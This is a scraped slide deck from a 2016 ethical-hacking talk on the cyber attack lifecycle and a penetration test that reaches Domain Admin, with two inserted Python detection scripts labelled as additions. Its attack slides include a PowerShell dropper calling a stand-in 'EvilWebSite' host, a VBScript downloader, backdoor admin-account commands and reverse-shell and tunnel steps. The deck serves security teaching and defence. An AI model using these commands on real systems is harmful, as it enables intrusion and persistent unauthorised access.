DIGITAL SECURITY FRONTLINE
Cyber Security
Attack Methodologies
Agenda
• Objectives
• Introduction
• Cyber Attack Lifecycle
• Vulnerabilities and Exploitation
• Example of a penetration test scenario
• Conclusion
Objectives
Objectives
 Get insights on the methodologies used during a Cyber Attack
 Understand how hackers penetrate a network, elevate their
privileges, maintain persistence and hide their malicious
activities
 Show hands-on:
 Provide a concrete example using Metasploit tool
 Show a Demo in real time
 Deep dive into a real life pentesting exercise
 Understand what can be done to protect against cyber attacks
Introduction
Introduction
 Frédéric De Pauw
 Co-Founder / Offensive Security @Avanguard
 Ethical Hacker
Head IT Security @Ethias
Freelance Ethical Hacker (BE – LUX – US)
https://be.linkedin.com/in/fdepauw
Introduction
 What is Cyber Crime?
 Computer crime, or cybercrime, is crime that involves a
computer and a network
 Two types of Cyber Crime:
Technology is the Target: enterprise, state and
personal systems
Technology is the Instrument: criminal activities on the
Internet
 This session is focused on the first type
Introduction
Technology = Target: Distributed Denial of Service, Hacking, Malware / Ransomware, Phishing, Hacktivism, …
Technology = Instrument: Child pornography, Incitement to racial hatred, Incitement to terrorism, Money Laundering, Drug selling, Spam, …
Introduction Cyber Crime
 Has evolved drastically over the past years, following the global evolution of ICT
supporting human activity
 Allows cyber criminals to make profits equivalent to those of other types of criminality
 Offers some advantages over other criminal activities: anonymity, discretion,
borderless operation
 Remains little fought, with no international legislation
 Has evolved into cyber war with state-sponsored attacks
 Will affect our lives (connected cars, Operational Technologies, IoT)
 Cost of Cyber Crime in Belgium: 3,5 billion Euros
Introduction
• Evolution of Cyber Crime (chart: sophistication increasing over time)
 1985-1995: Entertainment, First Worms, Phone Hacking
 Hacktivism, Virus Spread, Website Defacement
 Organized Crime, DDOS, Company Systems Hacking, Data Leak, Industrial espionage
 2010-2016-…: Cyber War, Targeted Attacks, State-Sponsored Attacks
Introduction
 Future of Cyber Crime
 Intensification of targeted cyber attacks against enterprises with important impacts
(financial, reputation..)
 Predominance of Advanced Persistent Threats targeting the end user
 Intensification of cyber war / cyber espionage activities between nations
 Increase of cyber crime targeting connected objects and operational technologies
 Hacking of a plane - 2015
 Hacking of a pacemaker - 2013
 Cars hacking - 2015
Introduction
 Legal evolution
 General Data Protection Regulation (GDPR) – adopted end of 2016 –
comes into force 25 May 2018
 Circulars of the National Bank of Belgium
 Regulation for the financial sector
 Data Breach notification standard
 Within 72 hours
 Fines in case of data leak
 Max 4% of turnover, maximum 20 M€
Cyber Attack Life Cycle
Cyber Attack Lifecycle
1 Reconnaissance: Public Information, Social Networks, Vulnerability Scanning, Physical Observation
2 Initial Infection: Vulnerabilities, Virus / Malware, Social Engineering, Physical Intrusion
3 Gain Control: control the infected system
4 Privilege Escalation: gain elevated privileges on the infected system
5 Lateral Movement: compromise more systems deeper in the network
6 Persistence: maintain a persistent connection with infected systems
7 Malicious Activities: Data Exfiltration, Hacking Websites, Money Extortion, ..
Cyber Attack Lifecycle
> Reconnaissance
 The reconnaissance process is a key activity
 Indeed, during this phase crucial information is obtained in order to
perform a cyber attack
 For instance, this information will be used to determine the best attack vector
to be used
 Activities performed are:
 Collect information concerning the target (websites, telephone numbers,
general mailboxes..) through public information
 Collect information through direct contact such as phone calls (fake poll, job
seeker..)
 Collect technical information concerning the target information system
(exposed systems, partners, data centers..)
 Collect information on premises (garbage, WIFI scanning..)
 Actively scan enterprise networks exposed on Internet
Cyber Attack Lifecycle
> Reconnaissance
Commercial Tool: Maltego
Free Tools (Kali Linux):
• recon-ng
• DMItry
• theharvester
Cyber Attack Lifecycle
> Reconnaissance
Wifi Reconnaissance and Hacking tools from hakshop.com
Cyber Attack Lifecycle
> Reconnaissance
 After the reconnaissance activities, attackers must have obtained enough information
to determine the best attack vectors for the initial infection phase
 For instance:
 Vulnerabilities affecting systems exposed on Internet
 Lack of physical access control at facilities
 Social engineering attack on profiles selected from, for instance, social network information
Cyber Attack Lifecycle
> Initial Infection
 Initial Infection is aimed at obtaining a first backdoor within the target
information system
 Vectors:
 Exploiting a vulnerability affecting the victim’s system(s)
 Infection through Virus / Malware
 Exploiting a physical vulnerability
 Installing rogue access points or devices
Cyber Attack Lifecycle
> Initial Infection
(Diagram: entry points across the perimeter, public cloud, private cloud and corporate network: on-prem, SaaS and corporate applications, each with its servers / appliances and security technology, plus the end users.)
Cyber Attack Lifecycle
> Initial Infection
Lan Turtle from Hakshop
https://youtu.be/l8YpTOv7Q2A
Cyber Attack Lifecycle
> Initial Infection
 IDS/IPS Bypass
 Encryption
 Anti-Virus Bypass
 Use a simple PowerShell one-liner as a dropper which fetches an encrypted payload
over Internet:
powershell.exe "IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt'))"
 Unknown Viruses
 Use Staging to decouple payload from initial dropper.
The dropper is injected directly into memory
 Firewall Bypass
 Uses “reverse” connections which connect to the C&C
 E.g. HTTPS passing through the Enterprise Proxy
Cyber Attack Lifecycle
> Initial Infection
 Free tool for malware code obfuscation
 VEIL Evasion Framework
 Generate obfuscated payload using several methodologies
 Metasploit Meterpreter payloads
 Generate payloads from different sources
 C/C++ shellcode
 Powershell shellcode
 Python shellcode
Cyber Attack Lifecycle
> Initial Infection
 Metasploit + Veil framework
 Create a Meterpreter backdoor obfuscated with VEIL
 Powershell type
Cyber Attack Lifecycle
> Initial Infection
 Metasploit + VEIL Framework
 Create a Meterpreter backdoor using VEIL for Antivirus Avoidance
 Embed the Virus in a Word Macro, or create a .bat, include payload
or fetch the payload on a Web Server
Cyber Attack Lifecycle
> Initial Infection
 Start the Listener on Metasploit
More during the Demo
Cyber Attack Lifecycle
> Gain Control
 Once the initial infection is performed, the objective is to get control
over the machine.
 For this, a network connection must be established between the
victim and the Command & Control Server
 In general a « reverse » connection is made to bypass inbound
firewall protection
 Several techniques exist to bypass outbound filtering (if present)
Cyber Attack Lifecycle
> Gain Control
 Standard Enterprise security principles for Outbound filtering:
 Default policy is to deny all outbound connections
 Allowed outbound connections must go through a proxy
 Outbound connections must conform to the expected protocol
 Outbound connections must pass other checks as well.
 Outbound filtering evasion techniques, examples:
 Reverse HTTP and / or HTTPS traffic (with or without verification of the Proxy settings)
 Payload staging over DNS by setting the payload into TXT Records of a
domain
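The defensive counterpart to the DNS TXT staging technique above, as an added example that is not part of the original slides: it scores resolver log lines and flags a client that pulls several long, high-entropy, base64-looking TXT answers under one parent domain. The log line format and the domain names are constructed assumptions.

```python
"""Detect payload staging over DNS TXT records from resolver logs.

Constructed example (not from the slides). Assumed log format, one
query/answer pair per line:  <client ip> <qname> <qtype> "<answer>"
"""
import base64
import math
import re
from collections import defaultdict

B64_CHARS = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")
LOG_RE = re.compile(r'^(?P<client>\S+) (?P<qname>\S+) (?P<qtype>\S+) "(?P<answer>.*)"$')


def shannon_entropy(text):
    """Bits per character; encoded or compressed data scores high."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def base64_ratio(text):
    """Fraction of characters that belong to the base64 alphabet."""
    return sum(ch in B64_CHARS for ch in text) / len(text) if text else 0.0


def looks_like_staged_chunk(answer, min_len=80, min_ratio=0.95, min_entropy=4.0):
    """True when a TXT answer resembles a chunk of an encoded payload rather
    than a human-readable record (SPF, DMARC, site verification)."""
    return (len(answer) >= min_len
            and base64_ratio(answer) >= min_ratio
            and shannon_entropy(answer) >= min_entropy)


def parse_line(line):
    match = LOG_RE.match(line.strip())
    return match.groupdict() if match else None


def detect_txt_staging(log_text, min_chunks=3):
    """Group suspicious TXT answers by (client, parent domain) and return the
    groups that reached min_chunks, i.e. probable staging sessions."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["qtype"] != "TXT":
            continue
        if not looks_like_staged_chunk(rec["answer"]):
            continue
        # Parent domain: drop the first label, which usually carries the chunk index
        labels = rec["qname"].rstrip(".").split(".")
        parent = ".".join(labels[1:]) if len(labels) > 2 else rec["qname"]
        groups[(rec["client"], parent)].append(rec["qname"])
    return {key: names for key, names in groups.items() if len(names) >= min_chunks}


def build_sample_log():
    """Constructed resolver log: benign TXT records plus a fake payload
    (base64 of the bytes 0..255, split into 4 TXT chunks) pulled by one client."""
    blob = base64.b64encode(bytes(range(256))).decode()
    chunk_len = len(blob) // 4  # 344 characters / 4 = 86 per chunk
    lines = [
        '10.0.5.12 example.org TXT "v=spf1 include:_spf.example.org -all"',
        '10.0.5.12 _dmarc.example.org TXT "v=DMARC1; p=reject; rua=mailto:dmarc@example.org"',
        '10.0.5.77 example.org TXT "google-site-verification=abc123"',
    ]
    for i in range(4):
        chunk = blob[i * chunk_len:(i + 1) * chunk_len]
        lines.append(f'10.0.5.40 {i}.stage.staging-domain.test TXT "{chunk}"')
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    for (client, parent), names in detect_txt_staging(build_sample_log()).items():
        print(f"possible DNS TXT staging: client={client} parent={parent} chunks={len(names)}")
```

Tune the thresholds against your own resolver's baseline; long legitimate TXT records (DKIM keys) have a similar profile and belong on an allow list keyed by parent domain.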
Cyber Attack Lifecycle
> Gain Control
 Metasploit / Meterpreter
 Meterpreter is an advanced, dynamically extensible payload that
uses in-memory DLL injection stagers and is extended over the
network at runtime. It communicates over the stager socket and
provides a comprehensive client-side Ruby API. It features
command history, tab completion, channels, and more.
Cyber Attack Lifecycle
> Privilege Escalation
 Escalate privileges from infected machines in order to gain elevated access
 The typical example is getting Administrator or System privileges
 Several techniques
 « Local Exploits » from local applications on the infected machine
 Manual search for credentials in scripts
 Password Hashes dump (e.g. SAM, /etc/passwd) and cracking
 Authenticated Sessions grabbing (e.g. VPN Sessions)
 SSH Keys
 World Writeable files
 Read command history files
 Batches / Jobs alteration
 Process Injection
 Try injecting malicious code in processes running under « Domain Admin » privileged user
Cyber Attack Lifecycle
> Privilege Escalation
 Metasploit: « Incognito » module
 Allows impersonating authentication tokens on compromised Windows hosts
 Backdoor must run under « SYSTEM » or « Administrator » privilege in order to see
interesting authentication tokens
 TIP: File servers are virtual treasure troves of tokens since most file servers are used
as network attached drives via domain logon scripts
Cyber Attack Lifecycle
> Lateral Movement
 From Infected systems, try to infect more systems deeper in the
Network
 Basically repeat the cyber Attack Lifecycle process (recon, initial
infection, privilege escalation…)
 Aim for high value systems, windows domain controllers, file servers..
 Techniques
 Credential re-use / pass-the-hash / SSH keys re-use
 Internal applications vulnerabilities (less often patched)
 Network segmentation issues between environments ( e.g. Port 445) – PsExec
with Pass-The-Hash
Cyber Attack Lifecycle
> Lateral Movement
 Metasploit – Pivoting technique
 Basically using the first compromise to allow and even aid in the
compromise of other otherwise inaccessible systems
Cyber Attack Lifecycle
> Lateral Movement
 Metasploit – Pivoting technique
 Use Autoroute to make the compromised host a pivot to other
networks
Cyber Attack Lifecycle
> Lateral Movement
 Metasploit – Pivoting technique
 Scan the network through the route created on ports 139 & 445
Cyber Attack Lifecycle
> Lateral Movement
 Metasploit – Pivoting technique
 Start a new session on a new host using PsExec and “Pass-The-Hash”
technique re-using local Administrator password hash
Cyber Attack Lifecycle
> Maintain Persistence
 Prevent loss of connection between infected machines and the C&C
 Techniques
 Create jobs / schedule tasks
 Create service running on startup
 Use AppInit DLLs (disabled in Windows 8 with Secure Boot enabled)
 Bootkit / Rootkit
 Default file association
 Logon Scripts
 Modification of Applications / Services
 Registry RUN keys
Cyber Attack Lifecycle
> Maintain Persistence
 Metasploit / Persistence module
 Create a Meterpreter service which will start when the
compromised host boots
Cyber Attack Lifecycle
> Demo
 Social Engineering scenario
 Send a « Virus » to the victim which consists of a Metasploit
Meterpreter instance
 Undetected by up to date commercial antivirus
1. Prepare Malware & environment
2. Send Malware
3. Execute Malware
4. Get infected & Contact C&C
5. Interact
Vulnerabilities and
Exploitation
Vulnerabilities and Exploitation
 A vulnerability is a flaw in a system which allows a malicious user to compromise its
Confidentiality, Integrity and / or Availability
 Simple – Default Password. Complex – Buffer Overflow in an application
 Dozens of new vulnerabilities are officially classified every day
 http://www.cvedetails.com
 Dozens of others are not disclosed!
 0DAY – Vulnerabilities not yet discovered, or not disclosed
 Vulnerabilities are discovered by
 Researchers, students (Ethical Hackers)
 Professional researchers ( Vulnerability Brokers )
 http://www.zerodayinitiative.com/
 France - Vupen Security – Sells vulnerabilities to NASA
 Cyber Criminals ( 0DAYS )
Vulnerabilities and Exploitation
 Full Disclosure principle
 Vulnerabilities are reported and published publicly as soon as discovered, without taking
into account whether a patch is available
 Responsible disclosure principle
 Vendors are notified first
 The vulnerability is publicly disclosed after 45 days
 Websites with vulnerabilities and associated exploits
 www.securityfocus.com
 www.1337day.com (not free)
 http://www.cvedetails.com/
 http://www.exploit-db.com/
 Underground Websites on TOR network
 Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR)
ccc.de (ALL), blackhat.com (US)
Vulnerabilities and Exploitation
Vulnerabilities and Exploitation
 Complexity of systems, applicative codes, communication flows, network
segmentation
 Out-of-the-box vulnerabilities of Vendor solutions, lack of security
configuration
 Next->Next->Next Syndrome
 Lack of secure coding awareness
 TOP 10 OWASP
 Lack of enforcement for Security during IT Projects
 Security implies Cost and Time
 Need for functionality <-> Need for security
 BlackList Mode
 Learning Mode
Penetration test example
Penetration test example
• Context: Black Box intrusion test. Scope: external-facing
systems
(Diagram: Web servers, ports 80 (HTTP) and 443 (HTTPS), in the DMZ; Intranet / internal network with the Enterprise Windows Domain.)
Penetration test example
• VULN 1/2: Vulnerable deployment of SAP BO ( Apache Axis2 )
• CVE-2010-0219 , Apache Axis2 Default Credentials
• http://www.securityfocus.com/bid/40343 , Apache Axis2
Directory Traversal
• See earlier:
• Vuln « Directory Traversal »
• Vuln « Default Password »
• Together they give admin credentials to Axis2
Penetration test example
Penetration test example
• Access to the Axis2 administration console allows uploading a Web
Service and hot-deploying it
Penetration test example
• A Metasploit module exists to exploit this vuln: Axis2 / SAP BusinessObjects
Authenticated Code Execution
• http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer
• We use it to deploy a reverse shell backdoor on the server which connects back to
port 80
• VULN 3: The server is allowed to contact any host on Internet on ports 80 and 443
(Diagram: Web servers in the DMZ, ports 80 (HTTP) and 443 (HTTPS); Enterprise Windows Domain on the internal network; the web server connects out on port 80 to the C&C server.)
Penetration test example
• Not possible to upload a meterpreter (killed by AV on the machine)
• Possible to upload a backdoor which sends me back a DOS
command prompt on the server
Penetration test example
• Next steps:
• Create a privileged account on the server
• VULN 4: Application server is running under ADMIN privileges
• net user temptest password /add
• net localgroup Administrators temptest /add
• Obtain a Remote Desktop connection
• Problem: Port 3389 closed Inbound
• Solution: create a reverse SSH tunnel with reverse port-forwarding on port 3389
(Diagram: Web server → C&C server on port 80; reverse SSH tunnel from the web server to the SSH server on port 443, carrying port 3389 back through it.)
Penetration test example
• To create the tunnel, I need to download an SSH client onto
the server using the DOS command prompt
• I create a VBScript file line by line using the « echo » command, then
execute the VBScript
• echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> dl.vbs
• cscript dl.vbs
• Use plink to create the tunnel
dl.vbs (downloads plink.exe using the XMLHTTP and ADODB.Stream COM objects):
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://www.putty.com/plink.exe", False
xHttp.Send
with bStrm
.type = 1 '// binary stream
.open
.write xHttp.responseBody
.savetofile "c:\temp\plink.exe", 2 '// 2 = overwrite an existing file
end with
Penetration test example
(Diagram: Web server → C&C server on port 80; reverse SSH tunnel on port 443 carrying port 3389.)
 Connect to RDP through the tunnel and use the user account I just
created (temptest / password) to connect
Penetration test example
 Next Step -> Lateral Movement – the simplest first: credential
reuse
 I need to crack all passwords present locally on the infected server
 Vuln 6/7: Windows 2003 Design Vulnerabilities
 VULN 6: the Windows « Repair » folder contains a SAM backup file with credentials
hashed using LMHASH
 VULN 7: the LMHASH algorithm is broken and can be cracked
easily
Penetration test example
 After some minutes
Penetration test example
 VULN 8: Local Administrator password is replicated over all systems
in the DMZ
(Diagram: with the local Administrator hash, the same RDP path over the reverse SSH tunnel (port 443, carrying port 3389) reaches every other web server in the DMZ.)
Penetration test example
 Next step: try to reach the Internal Network
 VULN 9 : DMZ systems are members of the Internal Windows Domain. This means that
critical ports ( e.g. 139, 445, … ) must be open between the DMZ and the Internal
network
 VULN 10 : Password Replication Bis – A Domain Admin user account whose
name is identical to a local account has the same password
Penetration test example
 I connect to the Domain Controller from the DMZ using the Domain
Admin account. I am now Domain Administrator and have full control
over the Enterprise Domain
(Diagram: Web servers, ports 80 (HTTP) and 443 (HTTPS), in the DMZ; Enterprise Windows Domain and Domain Controller on the internal network.)
Conclusion
Conclusion
 Cyber Crime will continue to be a major threat for enterprises for the next
years
 Computer Vulnerabilities will continue to be discovered and will continue
to affect enterprises
 Legacy technologies such as standard AV are no longer sufficient to protect
against cyber threats
 Operational IT Security programs must address security incident response
and must address each of the following:
 Awareness
 Preventive security
 Detective security
 Corrective security
Conclusion
 [Personal Statement] Be careful with the notion of Risk-Based Security
based on asset classification
 Should less critical systems be given less attention in terms of security?
 What if a hacker can compromise a system in a non-critical zone and obtain credentials that are re-used in
other zones? What if the enterprise does not have one Windows Domain per Risk Domain?
 Use Risk-Based security only if you have full IT isolation… and even then, is that enough?
 Awareness
 Educate all your employees about emerging cyber threats
 Run real social-engineering exercises, sending undetected Viruses to your employees
 Be careful about human reactions
 Educate but also protect colleagues who will be infected during the exercise
Conclusion
 Preventive Security
 Sandboxing technologies must be implemented in parallel with standard signature-based AV to protect against
APTs
 Implement NAC
 Identify your vulnerabilities before the hackers
 Network security must be governed: network segmentation policies, firewall rules governance, flow and
application control, inbound and outbound traffic policies..
 High Privileges Management
 Isolation of network tiers
 Use hardening best practices
 E.g. Remove admin rights from end users and from applications (least privilege)
 Implement correct Windows security settings
Conclusion
 Detective security
 Real-time correlation of technical use cases has a real added-value
 Monitor for accounts creation on any system
 Monitor any “Domain Admin” privilege elevation
 Monitor for internal scans
 Monitor authentication failures
 Monitor denied outbound traffic
 Corrective Security
 Have emergency security procedures for containment defined and tested
 Have a security incident response plan
 Have a patching policy
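The first monitoring use cases above, as an added example that is not part of the original slides: Python detection rules over constructed Windows Security event lines that flag account creation (event 4720), addition to a privileged group (4732 local Administrators, 4728 Domain Admins) correlated with a creation shortly before it, which is exactly the net user / net localgroup sequence of the penetration test, and bursts of logon failures (4625). The log line format and the sample values are assumptions.

```python
"""Detection rules for account creation, privileged-group changes and
logon-failure bursts (constructed example, not code from the slides).

Assumed log format, one event per line:
    <ISO time> <host> <event id> key=value key="value with spaces" ...
Event IDs are the standard Windows Security ones: 4720 user created,
4732 member added to local group, 4728 member added to global group,
4625 logon failure.
"""
import shlex
from collections import defaultdict
from datetime import datetime, timedelta

ACCOUNT_CREATED, LOCAL_GROUP_ADD, GLOBAL_GROUP_ADD, LOGON_FAILURE = 4720, 4732, 4728, 4625
PRIVILEGED_GROUPS = {"Administrators", "Domain Admins"}

# Constructed sample replaying the pentest steps: a failed-logon burst, then
# "net user temptest ... /add" followed by "net localgroup Administrators
# temptest /add" on the web server, and an unrelated Domain Admins change.
SAMPLE_LOG = """\
2016-12-06T10:13:55 WEB01 4625 TargetUserName=administrator IpAddress=10.10.1.5
2016-12-06T10:13:56 WEB01 4625 TargetUserName=administrator IpAddress=10.10.1.5
2016-12-06T10:13:57 WEB01 4625 TargetUserName=administrator IpAddress=10.10.1.5
2016-12-06T10:13:58 WEB01 4625 TargetUserName=administrator IpAddress=10.10.1.5
2016-12-06T10:13:59 WEB01 4625 TargetUserName=administrator IpAddress=10.10.1.5
2016-12-06T10:14:02 WEB01 4720 TargetUserName=temptest SubjectUserName=SYSTEM
2016-12-06T10:14:09 WEB01 4732 TargetUserName=Administrators MemberName=temptest SubjectUserName=SYSTEM
2016-12-06T11:30:00 DC01 4728 TargetUserName="Domain Admins" MemberName=svc_backup SubjectUserName=jdoe
"""


def parse_event(line):
    """Parse one log line into a dict; returns None for malformed lines."""
    parts = shlex.split(line)
    if len(parts) < 3 or not parts[2].isdigit():
        return None
    event = {"time": datetime.fromisoformat(parts[0]), "host": parts[1], "id": int(parts[2])}
    for kv in parts[3:]:
        key, _, value = kv.partition("=")
        event[key] = value
    return event


def detect(log_text, fail_threshold=5, window=timedelta(minutes=10)):
    """Run the rules over the log; returns a list of (severity, message)."""
    events = [e for e in (parse_event(line) for line in log_text.splitlines()) if e]
    alerts = []
    created = {}                  # (host, account) -> creation time
    failures = defaultdict(list)  # (host, source ip) -> recent failure times

    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == ACCOUNT_CREATED:
            acct = ev.get("TargetUserName", "?")
            created[(ev["host"], acct)] = ev["time"]
            alerts.append(("medium", f'{ev["host"]}: account "{acct}" created by '
                                     f'{ev.get("SubjectUserName", "?")}'))
        elif ev["id"] in (LOCAL_GROUP_ADD, GLOBAL_GROUP_ADD):
            # For group-membership events the group is the target and the account the member
            group, member = ev.get("TargetUserName", "?"), ev.get("MemberName", "?")
            if group not in PRIVILEGED_GROUPS:
                continue
            severity, msg = "high", f'{ev["host"]}: "{member}" added to {group}'
            t0 = created.get((ev["host"], member))
            if t0 is not None and ev["time"] - t0 <= window:
                # A freshly created account elevated right away: the pentest pattern
                severity = "critical"
                msg += f" {int((ev['time'] - t0).total_seconds())}s after creation"
            alerts.append((severity, msg))
        elif ev["id"] == LOGON_FAILURE:
            key = (ev["host"], ev.get("IpAddress", "?"))
            recent = [t for t in failures[key] if ev["time"] - t <= window]  # sliding window
            recent.append(ev["time"])
            failures[key] = recent
            if len(recent) == fail_threshold:
                alerts.append(("medium", f"{ev['host']}: {fail_threshold} logon failures "
                                         f"from {key[1]} within {window}"))
    return alerts


if __name__ == "__main__":
    for severity, message in detect(SAMPLE_LOG):
        print(f"[{severity}] {message}")
```

The "created by SYSTEM" detail in the first alert is itself a finding: an account created from a service context points at an application running with administrative rights (VULN 4 in the penetration test).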
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
Shivam Sahu
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
Keith Brooks
 
Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush Gupta
Tenet Systems Pvt Ltd
 
Fundamental of ethical hacking
Fundamental of ethical hackingFundamental of ethical hacking
Fundamental of ethical hacking
Waseem Rauf
 
Common Types of Cyber Attacks & How to Prevent Them.pptx
Common Types of Cyber Attacks & How to Prevent Them.pptxCommon Types of Cyber Attacks & How to Prevent Them.pptx
Common Types of Cyber Attacks & How to Prevent Them.pptx
KalponikPrem
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
Anumadil1
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
Chetanmalviya8
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Wayne Huang
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasAditya K Sood
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
Priyanka Aash
 

Similar to Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Decembre 2016 (20)

The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary ReadingThe Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
 
certified-ethical-hacker-cehv12_course_content.pdf
certified-ethical-hacker-cehv12_course_content.pdfcertified-ethical-hacker-cehv12_course_content.pdf
certified-ethical-hacker-cehv12_course_content.pdf
 
certified-ethical-hacker-cehv12_course_content
certified-ethical-hacker-cehv12_course_contentcertified-ethical-hacker-cehv12_course_content
certified-ethical-hacker-cehv12_course_content
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Mim Attack Essay
Mim Attack EssayMim Attack Essay
Mim Attack Essay
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
 
Ceh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hackingCeh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hacking
 
DEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptDEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.ppt
 
Cse ethical hacking ppt
Cse ethical hacking pptCse ethical hacking ppt
Cse ethical hacking ppt
 
Cse ethical hacking ppt
Cse ethical hacking pptCse ethical hacking ppt
Cse ethical hacking ppt
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush Gupta
 
Fundamental of ethical hacking
Fundamental of ethical hackingFundamental of ethical hacking
Fundamental of ethical hacking
 
Common Types of Cyber Attacks & How to Prevent Them.pptx
Common Types of Cyber Attacks & How to Prevent Them.pptxCommon Types of Cyber Attacks & How to Prevent Them.pptx
Common Types of Cyber Attacks & How to Prevent Them.pptx
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
 

Recently uploaded

Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*
Frank van Harmelen
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
Product School
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Product School
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Ramesh Iyer
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
OnBoard
 
Generating a custom Ruby SDK for your web service or Rails API using Smithy
